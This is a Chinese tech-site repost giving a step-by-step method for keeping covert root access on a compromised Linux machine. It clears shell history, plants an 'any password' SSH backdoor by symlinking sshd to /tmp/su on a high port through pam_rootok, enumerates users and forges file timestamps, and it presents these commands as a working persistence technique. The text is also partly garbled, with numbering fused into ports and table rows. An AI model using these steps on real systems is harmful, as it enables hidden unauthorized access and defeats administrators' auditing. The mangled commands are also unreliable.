很多时候我们拿下机器后需要维持权限,在计划任务上加入定时反dshell这很容易被 运维人员发现,有些场景没必要用到rootkit级别的后门,我们可以尝试使用ssh后门
1.目的
长期维持机器root权限,同时后门有需要躲避管理检测
通信隐蔽、自启动项隐藏、文件隐藏、进程/模块隐藏、注册表隐藏、服务隐藏、端口隐藏等
SSH命令痕迹清除,登陆之后先执行
unset HISTfile;export HISTfileSIZE=0;export HISTIGnorE=*;export HISTCONTRol=ignorespace
每次输入命令前加上空格即可不再history中记录命令
2.后门方式ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=313373.使用使用任意密码登录系统后门
ssh root:[email protected] -p 313384.查看存在哪些用户
cat /etc/passwd|grep -v nologin|grep -v halt|grep -v shutdown|awk -F":" ‘{ print "|""|" }‘|more
1 # 如下2 root|0|03 sync|4|655344 MysqL|104|1095 postgres|113|1176 arpwatch|117|1207 Debian-snmp|118|1238 speech-dispatcher|127|299 Debian-gdm|130|1385.修改上传文件时间戳
touch -r 老文件时间戳 新文件时间戳
6.退出sshexit注
0.任意密码登陆的核心是auth sufficIEnt pam_rootok.so,只要PAM@R_404_6179@中包含此配置即可SSH任意密码登陆,实践表明,可成功利用的PAM@R_404_6179@除了su还有chsh、chfn1.前提linux软连接连接ssh后门需要ssh配置允许PAM认证才能使用2.被控主机不允许root登录,可用其他已存在用户登录
总结以上是内存溢出为你收集整理的SSH 维持权限(好用)全部内容,希望文章能够帮你解决SSH 维持权限(好用)所遇到的程序开发问题。
如果觉得内存溢出网站内容还不错,欢迎将内存溢出网站推荐给程序员好友。
欢迎分享,转载请注明来源:内存溢出
评论列表(0条)